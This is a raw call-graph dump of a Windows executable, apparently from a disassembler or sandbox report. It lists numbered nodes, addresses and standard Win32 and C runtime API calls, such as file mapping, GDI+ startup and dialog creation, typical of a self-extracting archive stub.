24318->24310 24319 101d963 24318->24319 24319->24310 24322 101b31e 24321->24322 24323 101b40d 24322->24323 24324 101b3f0 ExpandEnvironmentStringsW 24322->24324 24323->24273 24324->24323 24325->24273 24326->24295 24327->24273 24328->24273 24329->24273 24331 1028e54 24330->24331 24332 1028e61 24331->24332 24333 1028e6c 24331->24333 24358 1028e06 24332->24358 24335 1028e74 24333->24335 24342 1028e7d __dosmaperr 24333->24342 24336 1028dcc _free 20 API calls 24335->24336 24340 1028e69 24336->24340 24337 1028e82 24365 10291a8 20 API calls __dosmaperr 24337->24365 24338 1028ea7 HeapReAlloc 24338->24340 24338->24342 24340->24273 24342->24337 24342->24338 24366 1027a5e 7 API calls 2 library calls 24342->24366 24350 100a243 24343->24350 24346->24300 24347 100b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24347->24308 24348->24317 24349->24312 24351 101ec50 24350->24351 24352 100a250 GetFileAttributesW 24351->24352 24353 100a261 24352->24353 24354 100a23a 24352->24354 24355 100bb03 GetCurrentDirectoryW 24353->24355 24354->24306 24354->24347 24356 100a275 24355->24356 24356->24354 24357 100a279 GetFileAttributesW 24356->24357 24357->24354 24359 1028e44 24358->24359 24360 1028e14 __dosmaperr 24358->24360 24368 10291a8 20 API calls __dosmaperr 24359->24368 24360->24359 24361 1028e2f RtlAllocateHeap 24360->24361 24367 1027a5e 7 API calls 2 library calls 24360->24367 24361->24360 24363 1028e42 24361->24363 24363->24340 24365->24340 24366->24342 24367->24360 24368->24363 25203 1028268 25214 102bb30 25203->25214 25208 1028285 25210 1028dcc _free 20 API calls 25208->25210 25211 10282ba 25210->25211 25212 1028290 25213 1028dcc _free 20 API calls 25212->25213 25213->25208 25215 102827a 25214->25215 25216 102bb39 25214->25216 25218 102bf30 GetEnvironmentStringsW 25215->25218 25231 102ba27 25216->25231 25219 102bf9a 25218->25219 25220 102bf47 25218->25220 25221 102bfa3 FreeEnvironmentStringsW 25219->25221 25222 102827f 25219->25222 25223 102bf4d WideCharToMultiByte 25220->25223 25221->25222 25222->25208 25230 10282c0 26 API calls 4 library calls 25222->25230 25223->25219 25224 102bf69 25223->25224 25225 1028e06 __vsnwprintf_l 21 API calls 25224->25225 25226 102bf6f 25225->25226 25227 102bf8c 25226->25227 25228 102bf76 WideCharToMultiByte 25226->25228 25229 1028dcc _free 20 API calls 25227->25229 25228->25227 25229->25219 25230->25212 25232 10297e5 _abort 38 API calls 25231->25232 25233 102ba34 25232->25233 25251 102bb4e 25233->25251 25235 102ba3c 25260 102b7bb 25235->25260 25237 102ba53 25237->25215 25239 1028e06 __vsnwprintf_l 21 API calls 25240 102ba64 25239->25240 25241 102ba96 25240->25241 25267 102bbf0 25240->25267 25244 1028dcc _free 20 API calls 25241->25244 25244->25237 25245 102ba91 25277 10291a8 20 API calls __dosmaperr 25245->25277 25247 102bada 25247->25241 25278 102b691 26 API calls 25247->25278 25248 102baae 25248->25247 25249 1028dcc _free 20 API calls 25248->25249 25249->25247 25252 102bb5a __FrameHandler3::FrameUnwindToState 25251->25252 25253 10297e5 _abort 38 API calls 25252->25253 25255 102bb64 25253->25255 25258 102bbe8 _abort 25255->25258 25259 1028dcc _free 20 API calls 25255->25259 25279 1028d24 38 API calls _abort 25255->25279 25280 102ac31 EnterCriticalSection 25255->25280 25281 102bbdf LeaveCriticalSection _abort 25255->25281 25258->25235 25259->25255 25261 1024636 __cftof 38 API calls 25260->25261 25262 102b7cd 25261->25262 25263 102b7ee 25262->25263 25264 102b7dc GetOEMCP 25262->25264 25265 102b7f3 GetACP 25263->25265 25266 102b805 25263->25266 25264->25266 25265->25266 25266->25237 25266->25239 25268 102b7bb 40 API calls 25267->25268 25269 102bc0f 25268->25269 25271 102bc60 IsValidCodePage 25269->25271 25274 102bc16 25269->25274 25276 102bc85 __cftof 25269->25276 25270 101fbbc CatchGuardHandler 5 API calls 25272 102ba89 25270->25272 25273 102bc72 GetCPInfo 25271->25273 25271->25274 25272->25245 25272->25248 25273->25274 25273->25276 25274->25270 25282 102b893 GetCPInfo 25276->25282 25277->25241 25278->25241 25280->25255 25281->25255 25283 102b977 25282->25283 25288 102b8cd 25282->25288 25285 101fbbc CatchGuardHandler 5 API calls 25283->25285 25287 102ba23 25285->25287 25287->25274 25292 102c988 25288->25292 25291 102ab78 __vsnwprintf_l 43 API calls 25291->25283 25293 1024636 __cftof 38 API calls 25292->25293 25294 102c9a8 MultiByteToWideChar 25293->25294 25296 102c9e6 25294->25296 25303 102ca7e 25294->25303 25298 102ca07 __cftof __vsnwprintf_l 25296->25298 25299 1028e06 __vsnwprintf_l 21 API calls 25296->25299 25297 101fbbc CatchGuardHandler 5 API calls 25300 102b92e 25297->25300 25301 102ca78 25298->25301 25304 102ca4c MultiByteToWideChar 25298->25304 25299->25298 25306 102ab78 25300->25306 25311 102abc3 20 API calls _free 25301->25311 25303->25297 25304->25301 25305 102ca68 GetStringTypeW 25304->25305 25305->25301 25307 1024636 __cftof 38 API calls 25306->25307 25308 102ab8b 25307->25308 25312 102a95b 25308->25312 25311->25303 25313 102a976 __vsnwprintf_l 25312->25313 25314 102a99c MultiByteToWideChar 25313->25314 25315 102ab50 25314->25315 25316 102a9c6 25314->25316 25317 101fbbc CatchGuardHandler 5 API calls 25315->25317 25321 1028e06 __vsnwprintf_l 21 API calls 25316->25321 25323 102a9e7 __vsnwprintf_l 25316->25323 25318 102ab63 25317->25318 25318->25291 25319 102aa30 MultiByteToWideChar 25320 102aa9c 25319->25320 25322 102aa49 25319->25322 25348 102abc3 20 API calls _free 25320->25348 25321->25323 25339 102af6c 25322->25339 25323->25319 25323->25320 25327 102aa73 25327->25320 25330 102af6c __vsnwprintf_l 11 API calls 25327->25330 25328 102aaab 25329 1028e06 __vsnwprintf_l 21 API calls 25328->25329 25333 102aacc __vsnwprintf_l 25328->25333 25329->25333 25330->25320 25331 102ab41 25347 102abc3 20 API calls _free 25331->25347 25333->25331 25334 102af6c __vsnwprintf_l 11 API calls 25333->25334 25335 102ab20 25334->25335 25335->25331 25336 102ab2f WideCharToMultiByte 25335->25336 25336->25331 25337 102ab6f 25336->25337 25349 102abc3 20 API calls _free 25337->25349 25340 102ac98 __dosmaperr 5 API calls 25339->25340 25341 102af93 25340->25341 25343 102af9c 25341->25343 25350 102aff4 10 API calls 3 library calls 25341->25350 25345 101fbbc CatchGuardHandler 5 API calls 25343->25345 25344 102afdc LCMapStringW 25344->25343 25346 102aa60 25345->25346 25346->25320 25346->25327 25346->25328 25347->25320 25348->25315 25349->25320 25350->25344 25474 101c793 107 API calls 4 library calls 25424 1027f6e 52 API calls 2 library calls 25475 101a070 10 API calls 25477 101b270 99 API calls 25426 1001f72 128 API calls __EH_prolog 25386 1009a74 25387 1009a7e 25386->25387 25388 1009b9d SetFilePointer 25387->25388 25390 100981a 79 API calls 25387->25390 25391 1009b79 25387->25391 25392 1009ab1 25387->25392 25389 1009bb6 GetLastError 25388->25389 25388->25392 25389->25392 25390->25391 25391->25388 25478 1001075 84 API calls 25394 1009f7a 25395 1009f88 25394->25395 25396 1009f8f 25394->25396 25397 1009f9c GetStdHandle 25396->25397 25401 1009fab 25396->25401 25397->25401 25398 100a003 WriteFile 25398->25401 25399 1009fd4 WriteFile 25400 1009fcf 25399->25400 25399->25401 25400->25399 25400->25401 25401->25395 25401->25398 25401->25399 25401->25400 25403 100a095 25401->25403 25405 1006baa 78 API calls 25401->25405 25406 1006e98 77 API calls 25403->25406 25405->25401 25406->25395 25428 1019580 6 API calls 25481 101c793 102 API calls 4 library calls 25482 101c793 97 API calls 4 library calls 25432 101b18d 78 API calls 25484 101dca1 DialogBoxParamW 25433 101f3a0 27 API calls 25487 102a4a0 71 API calls _free 25488 102a6a0 31 API calls 2 library calls 25489 10308a0 IsProcessorFeaturePresent 25434 101eda7 48 API calls _unexpected 25436 1006faa 111 API calls 3 library calls 23513 101e5b1 23515 101e578 23513->23515 23516 101e85d 23515->23516 23542 101e5bb 23516->23542 23518 101e86d 23519 101e8ca 23518->23519 23530 101e8ee 23518->23530 23520 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23519->23520 23521 101e8d5 RaiseException 23520->23521 23522 101eac3 23521->23522 23522->23515 23523 101e966 LoadLibraryExA 23524 101e9c7 23523->23524 23525 101e979 GetLastError 23523->23525 23529 101e9d9 23524->23529 23531 101e9d2 FreeLibrary 23524->23531 23526 101e9a2 23525->23526 23527 101e98c 23525->23527 23532 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23526->23532 23527->23524 23527->23526 23528 101ea37 GetProcAddress 23533 101ea47 GetLastError 23528->23533 23537 101ea95 23528->23537 23529->23528 23529->23537 23530->23523 23530->23524 23530->23529 23530->23537 23531->23529 23534 101e9ad RaiseException 23532->23534 23541 101ea5a 23533->23541 23534->23522 23536 101e7fb DloadReleaseSectionWriteAccess 6 API calls 23538 101ea7b RaiseException 23536->23538 23551 101e7fb 23537->23551 23539 101e5bb ___delayLoadHelper2@8 6 API calls 23538->23539 23540 101ea92 23539->23540 23540->23537 23541->23536 23541->23537 23543 101e5c7 23542->23543 23544 101e5ed 23542->23544 23559 101e664 23543->23559 23544->23518 23546 101e5e8 23567 101e5ee GetModuleHandleW GetProcAddress GetProcAddress 23546->23567 23547 101e5cc 23547->23546 23562 101e78d 23547->23562 23550 101e836 23550->23518 23552 101e80d 23551->23552 23553 101e82f 23551->23553 23554 101e664 DloadReleaseSectionWriteAccess 3 API calls 23552->23554 23553->23522 23555 101e812 23554->23555 23556 101e82a 23555->23556 23557 101e78d DloadProtectSection 3 API calls 23555->23557 23570 101e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23556->23570 23557->23556 23568 101e5ee GetModuleHandleW GetProcAddress GetProcAddress 23559->23568 23561 101e669 23561->23547 23563 101e7a2 DloadProtectSection 23562->23563 23564 101e7dd VirtualProtect 23563->23564 23565 101e7a8 23563->23565 23569 101e6a3 VirtualQuery GetSystemInfo 23563->23569 23564->23565 23565->23546 23567->23550 23568->23561 23569->23564 23570->23553 25437 101b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23573 101f3b2 23574 101f3be __FrameHandler3::FrameUnwindToState 23573->23574 23605 101eed7 23574->23605 23576 101f3c5 23577 101f518 23576->23577 23580 101f3ef 23576->23580 23678 101f838 4 API calls 2 library calls 23577->23678 23579 101f51f 23671 1027f58 23579->23671 23592 101f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23580->23592 23616 1028aed 23580->23616 23587 101f40e 23589 101f48f 23624 101f953 GetStartupInfoW __cftof 23589->23624 23591 101f495 23625 1028a3e 51 API calls 23591->23625 23592->23589 23674 1027af4 38 API calls 2 library calls 23592->23674 23595 101f49d 23626 101df1e 23595->23626 23599 101f4b1 23599->23579 23600 101f4b5 23599->23600 23601 101f4be 23600->23601 23676 1027efb 28 API calls _abort 23600->23676 23677 101f048 12 API calls ___scrt_uninitialize_crt 23601->23677 23604 101f4c6 23604->23587 23606 101eee0 23605->23606 23680 101f654 IsProcessorFeaturePresent 23606->23680 23608 101eeec 23681 1022a5e 23608->23681 23610 101eef1 23615 101eef5 23610->23615 23689 1028977 23610->23689 23613 101ef0c 23613->23576 23615->23576 23618 1028b04 23616->23618 23617 101fbbc CatchGuardHandler 5 API calls 23619 101f408 23617->23619 23618->23617 23619->23587 23620 1028a91 23619->23620 23622 1028ac0 23620->23622 23621 101fbbc CatchGuardHandler 5 API calls 23623 1028ae9 23621->23623 23622->23621 23623->23592 23624->23591 23625->23595 23748 1010863 23626->23748 23630 101df3d 23797 101ac16 23630->23797 23632 101df46 __cftof 23633 101df59 GetCommandLineW 23632->23633 23634 101dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23633->23634 23635 101df68 23633->23635 23812 1004092 23634->23812 23801 101c5c4 23635->23801 23641 101dfe0 23806 101dbde 23641->23806 23642 101df76 OpenFileMappingW 23645 101dfd6 CloseHandle 23642->23645 23646 101df8f MapViewOfFile 23642->23646 23645->23634 23648 101dfa0 __InternalCxxFrameHandler 23646->23648 23649 101dfcd UnmapViewOfFile 23646->23649 23652 101dbde 2 API calls 23648->23652 23649->23645 23654 101dfbc 23652->23654 23654->23649 23655 10190b7 8 API calls 23656 101e0aa DialogBoxParamW 23655->23656 23657 101e0e4 23656->23657 23658 101e0f6 Sleep 23657->23658 23659 101e0fd 23657->23659 23658->23659 23662 101e10b 23659->23662 23845 101ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23659->23845 23661 101e12a DeleteObject 23663 101e13f DeleteObject 23661->23663 23666 101e146 23661->23666 23662->23661 23663->23666 23664 101e177 23846 101dc3b 6 API calls 23664->23846 23665 101e189 23842 101ac7c 23665->23842 23666->23664 23666->23665 23669 101e17d CloseHandle 23669->23665 23670 101e1c3 23675 101f993 GetModuleHandleW 23670->23675 24140 1027cd5 23671->24140 23674->23589 23675->23599 23676->23601 23677->23604 23678->23579 23680->23608 23693 1023b07 23681->23693 23685 1022a6f 23686 1022a7a 23685->23686 23707 1023b43 DeleteCriticalSection 23685->23707 23686->23610 23688 1022a67 23688->23610 23736 102c05a 23689->23736 23692 1022a7d 7 API calls 2 library calls 23692->23615 23694 1023b10 23693->23694 23696 1023b39 23694->23696 23697 1022a63 23694->23697 23708 1023d46 23694->23708 23713 1023b43 DeleteCriticalSection 23696->23713 23697->23688 23699 1022b8c 23697->23699 23729 1023c57 23699->23729 23702 1022ba1 23702->23685 23704 1022baf 23705 1022bbc 23704->23705 23735 1022bbf 6 API calls ___vcrt_FlsFree 23704->23735 23705->23685 23707->23688 23714 1023c0d 23708->23714 23711 1023d7e InitializeCriticalSectionAndSpinCount 23712 1023d69 23711->23712 23712->23694 23713->23697 23715 1023c4f 23714->23715 23716 1023c26 23714->23716 23715->23711 23715->23712 23716->23715 23721 1023b72 23716->23721 23719 1023c3b GetProcAddress 23719->23715 23720 1023c49 23719->23720 23720->23715 23727 1023b7e ___vcrt_FlsFree 23721->23727 23722 1023bf3 23722->23715 23722->23719 23723 1023b95 LoadLibraryExW 23724 1023bb3 GetLastError 23723->23724 23725 1023bfa 23723->23725 23724->23727 23725->23722 23726 1023c02 FreeLibrary 23725->23726 23726->23722 23727->23722 23727->23723 23728 1023bd5 LoadLibraryExW 23727->23728 23728->23725 23728->23727 23730 1023c0d ___vcrt_FlsFree 5 API calls 23729->23730 23731 1023c71 23730->23731 23732 1023c8a TlsAlloc 23731->23732 23733 1022b96 23731->23733 23733->23702 23734 1023d08 6 API calls ___vcrt_FlsFree 23733->23734 23734->23704 23735->23702 23739 102c073 23736->23739 23738 101eefe 23738->23613 23738->23692 23740 101fbbc 23739->23740 23741 101fbc5 IsProcessorFeaturePresent 23740->23741 23742 101fbc4 23740->23742 23744 101fc07 23741->23744 23742->23738 23747 101fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23744->23747 23746 101fcea 23746->23738 23747->23746 23847 101ec50 23748->23847 23751 1010888 GetProcAddress 23754 10108a1 23751->23754 23755 10108b9 GetProcAddress 23751->23755 23752 1010c14 GetModuleFileNameW 23764 1010c32 23752->23764 23753 10108e7 23753->23752 23858 10275fb 42 API calls 2 library calls 23753->23858 23754->23755 23756 10108cb 23755->23756 23756->23753 23758 1010b54 23758->23752 23759 1010b5f GetModuleFileNameW CreateFileW 23758->23759 23760 1010c08 CloseHandle 23759->23760 23761 1010b8f SetFilePointer 23759->23761 23760->23752 23761->23760 23762 1010b9d ReadFile 23761->23762 23762->23760 23766 1010bbb 23762->23766 23767 1010c94 GetFileAttributesW 23764->23767 23769 1010c5d CompareStringW 23764->23769 23770 1010cac 23764->23770 23849 100b146 23764->23849 23852 101081b 23764->23852 23766->23760 23768 101081b 2 API calls 23766->23768 23767->23764 23767->23770 23768->23766 23769->23764 23771 1010cb7 23770->23771 23773 1010cec 23770->23773 23774 1010cd0 GetFileAttributesW 23771->23774 23776 1010ce8 23771->23776 23772 1010dfb 23796 101a64d GetCurrentDirectoryW 23772->23796 23773->23772 23775 100b146 GetVersionExW 23773->23775 23774->23771 23774->23776 23777 1010d06 23775->23777 23776->23773 23778 1010d73 23777->23778 23779 1010d0d 23777->23779 23780 1004092 _swprintf 51 API calls 23778->23780 23781 101081b 2 API calls 23779->23781 23782 1010d9b AllocConsole 23780->23782 23783 1010d17 23781->23783 23784 1010df3 ExitProcess 23782->23784 23785 1010da8 GetCurrentProcessId AttachConsole 23782->23785 23786 101081b 2 API calls 23783->23786 23863 1023e13 23785->23863 23788 1010d21 23786->23788 23859 100e617 23788->23859 23789 1010dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23789->23784 23792 1004092 _swprintf 51 API calls 23793 1010d4f 23792->23793 23794 100e617 53 API calls 23793->23794 23795 1010d5e 23794->23795 23795->23784 23796->23630 23798 101081b 2 API calls 23797->23798 23799 101ac2a OleInitialize 23798->23799 23800 101ac4d GdiplusStartup SHGetMalloc 23799->23800 23800->23632 23804 101c5ce 23801->23804 23802 1011fac CharUpperW 23802->23804 23803 101c6e4 23803->23641 23803->23642 23804->23802 23804->23803 23888 100f3fa 82 API calls 2 library calls 23804->23888 23807 101ec50 23806->23807 23808 101dbeb SetEnvironmentVariableW 23807->23808 23810 101dc0e 23808->23810 23809 101dc36 23809->23634 23810->23809 23811 101dc2a SetEnvironmentVariableW 23810->23811 23811->23809 23889 1004065 23812->23889 23815 101b6dd LoadBitmapW 23816 101b70b GetObjectW 23815->23816 23817 101b6fe 23815->23817 23819 101b71a 23816->23819 23966 101a6c2 FindResourceW 23817->23966 23961 101a5c6 23819->23961 23822 101b770 23834 100da42 23822->23834 23824 101b74c 23982 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23824->23982 23825 101a6c2 13 API calls 23827 101b73d 23825->23827 23827->23824 23829 101b743 DeleteObject 23827->23829 23828 101b754 23983 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23828->23983 23829->23824 23831 101b75d 23984 101a80c 8 API calls 23831->23984 23833 101b764 DeleteObject 23833->23822 23995 100da67 23834->23995 23839 10190b7 24128 101eb38 23839->24128 23843 101acab GdiplusShutdown CoUninitialize 23842->23843 23843->23670 23845->23662 23846->23669 23848 101086d GetModuleHandleW 23847->23848 23848->23751 23848->23753 23850 100b196 23849->23850 23851 100b15a GetVersionExW 23849->23851 23850->23764 23851->23850 23853 101ec50 23852->23853 23854 1010828 GetSystemDirectoryW 23853->23854 23855 1010840 23854->23855 23856 101085e 23854->23856 23857 1010851 LoadLibraryW 23855->23857 23856->23764 23857->23856 23858->23758 23860 100e627 23859->23860 23865 100e648 23860->23865 23864 1023e1b 23863->23864 23864->23789 23864->23864 23871 100d9b0 23865->23871 23868 100e645 23868->23792 23869 100e66b LoadStringW 23869->23868 23870 100e682 LoadStringW 23869->23870 23870->23868 23876 100d8ec 23871->23876 23873 100d9cd 23874 100d9e2 23873->23874 23884 100d9f0 26 API calls 23873->23884 23874->23868 23874->23869 23877 100d904 23876->23877 23883 100d984 _strncpy 23876->23883 23880 100d928 23877->23880 23885 1011da7 WideCharToMultiByte 23877->23885 23879 100d959 23887 1026159 26 API calls 3 library calls 23879->23887 23880->23879 23886 100e5b1 50 API calls __vsnprintf 23880->23886 23883->23873 23884->23874 23885->23880 23886->23879 23887->23883 23888->23804 23890 100407c __vswprintf_c_l 23889->23890 23893 1025fd4 23890->23893 23896 1024097 23893->23896 23897 10240d7 23896->23897 23898 10240bf 23896->23898 23897->23898 23900 10240df 23897->23900 23913 10291a8 20 API calls __dosmaperr 23898->23913 23915 1024636 23900->23915 23901 10240c4 23914 1029087 26 API calls __cftof 23901->23914 23904 10240cf 23906 101fbbc CatchGuardHandler 5 API calls 23904->23906 23908 1004086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23906->23908 23908->23815 23909 1024167 23924 10249e6 51 API calls 4 library calls 23909->23924 23912 1024172 23925 10246b9 20 API calls _free 23912->23925 23913->23901 23914->23904 23916 1024653 23915->23916 23922 10240ef 23915->23922 23916->23922 23926 10297e5 GetLastError 23916->23926 23918 1024674 23947 102993a 38 API calls __cftof 23918->23947 23920 102468d 23948 1029967 38 API calls __cftof 23920->23948 23923 1024601 20 API calls 2 library calls 23922->23923 23923->23909 23924->23912 23925->23904 23927 1029807 23926->23927 23928 10297fb 23926->23928 23950 102b136 20 API calls 2 library calls 23927->23950 23949 102ae5b 11 API calls 2 library calls 23928->23949 23931 1029801 23931->23927 23933 1029850 SetLastError 23931->23933 23932 1029813 23934 102981b 23932->23934 23957 102aeb1 11 API calls 2 library calls 23932->23957 23933->23918 23951 1028dcc 23934->23951 23937 1029830 23937->23934 23939 1029837 23937->23939 23938 1029821 23940 102985c SetLastError 23938->23940 23958 1029649 20 API calls __dosmaperr 23939->23958 23959 1028d24 38 API calls _abort 23940->23959 23942 1029842 23944 1028dcc _free 20 API calls 23942->23944 23946 1029849 23944->23946 23946->23933 23946->23940 23947->23920 23948->23922 23949->23931 23950->23932 23952 1028dd7 RtlFreeHeap 23951->23952 23953 1028e00 _free 23951->23953 23952->23953 23954 1028dec 23952->23954 23953->23938 23960 10291a8 20 API calls __dosmaperr 23954->23960 23956 1028df2 GetLastError 23956->23953 23957->23937 23958->23942 23960->23956 23985 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23961->23985 23963 101a5cd 23964 101a5d9 23963->23964 23986 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23963->23986 23964->23822 23964->23824 23964->23825 23967 101a6e5 SizeofResource 23966->23967 23968 101a7d3 23966->23968 23967->23968 23969 101a6fc LoadResource 23967->23969 23968->23816 23968->23819 23969->23968 23970 101a711 LockResource 23969->23970 23970->23968 23971 101a722 GlobalAlloc 23970->23971 23971->23968 23972 101a73d GlobalLock 23971->23972 23973 101a7cc GlobalFree 23972->23973 23974 101a74c __InternalCxxFrameHandler 23972->23974 23973->23968 23975 101a754 CreateStreamOnHGlobal 23974->23975 23976 101a7c5 GlobalUnlock 23975->23976 23977 101a76c 23975->23977 23976->23973 23987 101a626 GdipAlloc 23977->23987 23980 101a7b0 23980->23976 23981 101a79a GdipCreateHBITMAPFromBitmap 23981->23980 23982->23828 23983->23831 23984->23833 23985->23963 23986->23964 23988 101a638 23987->23988 23990 101a645 23987->23990 23991 101a3b9 23988->23991 23990->23976 23990->23980 23990->23981 23992 101a3e1 GdipCreateBitmapFromStream 23991->23992 23993 101a3da GdipCreateBitmapFromStreamICM 23991->23993 23994 101a3e6 23992->23994 23993->23994 23994->23990 23996 100da75 __EH_prolog 23995->23996 23997 100daa4 GetModuleFileNameW 23996->23997 23998 100dad5 23996->23998 23999 100dabe 23997->23999 24041 10098e0 23998->24041 23999->23998 24001 100db31 24052 1026310 24001->24052 24005 100db44 24008 1026310 26 API calls 24005->24008 24006 100db05 24006->24001 24007 100e261 78 API calls 24006->24007 24019 100dd4a 24006->24019 24007->24006 24016 100db56 ___vcrt_FlsFree 24008->24016 24009 100dc85 24009->24019 24088 1009d70 81 API calls 24009->24088 24013 100dc9f ___std_exception_copy 24014 1009bd0 82 API calls 24013->24014 24013->24019 24017 100dcc8 ___std_exception_copy 24014->24017 24016->24009 24016->24019 24066 1009e80 24016->24066 24082 1009bd0 24016->24082 24087 1009d70 81 API calls 24016->24087 24017->24019 24036 100dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24017->24036 24089 1011b84 MultiByteToWideChar 24017->24089 24075 100959a 24019->24075 24020 100e159 24025 100e1de 24020->24025 24095 1028cce 26 API calls 2 library calls 24020->24095 24022 100e16e 24096 1027625 26 API calls 2 library calls 24022->24096 24024 100e214 24028 1026310 26 API calls 24024->24028 24025->24024 24031 100e261 78 API calls 24025->24031 24027 100e1c6 24097 100e27c 78 API calls 24027->24097 24030 100e22d 24028->24030 24032 1026310 26 API calls 24030->24032 24031->24025 24032->24019 24034 1011da7 WideCharToMultiByte 24034->24036 24036->24019 24036->24020 24036->24034 24090 100e5b1 50 API calls __vsnprintf 24036->24090 24091 1026159 26 API calls 3 library calls 24036->24091 24092 1028cce 26 API calls 2 library calls 24036->24092 24093 1027625 26 API calls 2 library calls 24036->24093 24094 100e27c 78 API calls 24036->24094 24039 100e29e GetModuleHandleW FindResourceW 24040 100da55 24039->24040 24040->23839 24042 10098ea 24041->24042 24043 100994b CreateFileW 24042->24043 24044 100996c GetLastError 24043->24044 24048 10099bb 24043->24048 24098 100bb03 24044->24098 24046 100998c 24047 1009990 CreateFileW GetLastError 24046->24047 24046->24048 24047->24048 24050 10099b5 24047->24050 24049 10099ff 24048->24049 24051 10099e5 SetFileTime 24048->24051 24049->24006 24050->24048 24051->24049 24053 1026349 24052->24053 24054 102634d 24053->24054 24065 1026375 24053->24065 24102 10291a8 20 API calls __dosmaperr 24054->24102 24056 1026352 24103 1029087 26 API calls __cftof 24056->24103 24057 1026699 24059 101fbbc CatchGuardHandler 5 API calls 24057->24059 24061 10266a6 24059->24061 24060 102635d 24062 101fbbc CatchGuardHandler 5 API calls 24060->24062 24061->24005 24064 1026369 24062->24064 24064->24005 24065->24057 24104 1026230 5 API calls CatchGuardHandler 24065->24104 24067 1009e92 24066->24067 24068 1009ea5 24066->24068 24069 1009eb0 24067->24069 24105 1006d5b 77 API calls 24067->24105 24068->24069 24071 1009eb8 SetFilePointer 24068->24071 24069->24016 24071->24069 24072 1009ed4 GetLastError 24071->24072 24072->24069 24073 1009ede 24072->24073 24073->24069 24106 1006d5b 77 API calls 24073->24106 24076 10095cf 24075->24076 24077 10095be 24075->24077 24076->24039 24077->24076 24078 10095d1 24077->24078 24079 10095ca 24077->24079 24112 1009620 24078->24112 24107 100974e 24079->24107 24083 1009be3 24082->24083 24084 1009bdc 24082->24084 24083->24084 24086 1009785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24083->24086 24127 1006d1a 77 API calls 24083->24127 24084->24016 24086->24083 24087->24016 24088->24013 24089->24036 24090->24036 24091->24036 24092->24036 24093->24036 24094->24036 24095->24022 24096->24027 24097->24025 24099 100bb10 _wcslen 24098->24099 24100 100bbb8 GetCurrentDirectoryW 24099->24100 24101 100bb39 _wcslen 24099->24101 24100->24101 24101->24046 24102->24056 24103->24060 24104->24065 24105->24068 24106->24069 24108 1009781 24107->24108 24109 1009757 24107->24109 24108->24076 24109->24108 24118 100a1e0 24109->24118 24113 100962c 24112->24113 24116 100964a 24112->24116 24115 1009638 CloseHandle 24113->24115 24113->24116 24114 1009669 24114->24076 24115->24116 24116->24114 24126 1006bd5 76 API calls 24116->24126 24119 101ec50 24118->24119 24120 100a1ed DeleteFileW 24119->24120 24121 100a200 24120->24121 24122 100977f 24120->24122 24123 100bb03 GetCurrentDirectoryW 24121->24123 24122->24076 24124 100a214 24123->24124 24124->24122 24125 100a218 DeleteFileW 24124->24125 24125->24122 24126->24114 24127->24083 24130 101eb3d ___std_exception_copy 24128->24130 24129 10190d6 24129->23655 24130->24129 24132 101eb59 24130->24132 24137 1027a5e 7 API calls 2 library calls 24130->24137 24133 101f5c9 24132->24133 24138 102238d RaiseException 24132->24138 24139 102238d RaiseException 24133->24139 24135 101f5e6 24137->24130 24138->24133 24139->24135 24141 1027ce1 _abort 24140->24141 24142 1027cfa 24141->24142 24143 1027ce8 24141->24143 24164 102ac31 EnterCriticalSection 24142->24164 24176 1027e2f GetModuleHandleW 24143->24176 24146 1027ced 24146->24142 24177 1027e73 GetModuleHandleExW 24146->24177 24147 1027d9f 24165 1027ddf 24147->24165 24151 1027d76 24156 1027d8e 24151->24156 24160 1028a91 _abort 5 API calls 24151->24160 24153 1027de8 24186 1032390 5 API calls CatchGuardHandler 24153->24186 24154 1027dbc 24168 1027dee 24154->24168 24155 1027d01 24155->24147 24155->24151 24185 10287e0 20 API calls _abort 24155->24185 24161 1028a91 _abort 5 API calls 24156->24161 24160->24156 24161->24147 24164->24155 24187 102ac81 LeaveCriticalSection 24165->24187 24167 1027db8 24167->24153 24167->24154 24188 102b076 24168->24188 24171 1027e1c 24174 1027e73 _abort 8 API calls 24171->24174 24172 1027dfc GetPEB 24172->24171 24173 1027e0c GetCurrentProcess TerminateProcess 24172->24173 24173->24171 24175 1027e24 ExitProcess 24174->24175 24176->24146 24178 1027ec0 24177->24178 24179 1027e9d GetProcAddress 24177->24179 24181 1027ec6 FreeLibrary 24178->24181 24182 1027ecf 24178->24182 24180 1027eb2 24179->24180 24180->24178 24181->24182 24183 101fbbc CatchGuardHandler 5 API calls 24182->24183 24184 1027cf9 24183->24184 24184->24142 24185->24151 24187->24167 24189 102b09b 24188->24189 24193 102b091 24188->24193 24194 102ac98 24189->24194 24191 101fbbc CatchGuardHandler 5 API calls 24192 1027df8 24191->24192 24192->24171 24192->24172 24193->24191 24195 102acc8 24194->24195 24198 102acc4 24194->24198 24195->24193 24196 102ace8 24196->24195 24199 102acf4 GetProcAddress 24196->24199 24198->24195 24198->24196 24201 102ad34 24198->24201 24200 102ad04 __dosmaperr 24199->24200 24200->24195 24202 102ad55 LoadLibraryExW 24201->24202 24203 102ad4a 24201->24203 24204 102ad72 GetLastError 24202->24204 24205 102ad8a 24202->24205 24203->24198 24204->24205 24206 102ad7d LoadLibraryExW 24204->24206 24205->24203 24207 102ada1 FreeLibrary 24205->24207 24206->24205 24207->24203 25439 102b1b8 27 API calls 2 library calls 25440 1011bbd GetCPInfo IsDBCSLeadByte 25441 101b5c0 100 API calls 25442 10177c0 118 API calls 25443 101ffc0 RaiseException _com_raise_error _com_error::_com_error 24214 101dec2 24215 101decf 24214->24215 24216 100e617 53 API calls 24215->24216 24217 101dedc 24216->24217 24218 1004092 _swprintf 51 API calls 24217->24218 24219 101def1 SetDlgItemTextW 24218->24219 